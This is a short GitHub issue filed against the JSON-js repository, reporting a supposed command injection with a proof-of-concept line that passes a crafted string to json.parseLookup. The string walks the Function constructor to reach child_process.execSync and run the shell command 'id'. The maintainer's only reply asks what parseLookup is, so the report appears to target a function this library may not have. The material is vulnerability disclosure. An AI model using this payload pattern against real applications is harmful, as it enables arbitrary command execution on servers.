search

douglascrockford / JSON-js

JSON in JavaScript
http://www.JSON.org/
8.7k stars 4.59k forks source link

Command Injection in argument #121

Closed po6ix closed 4 years ago

po6ix commented 4 years ago

POC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}');
console.log(res)
douglascrockford commented 4 years ago

What is 'parseLookup'?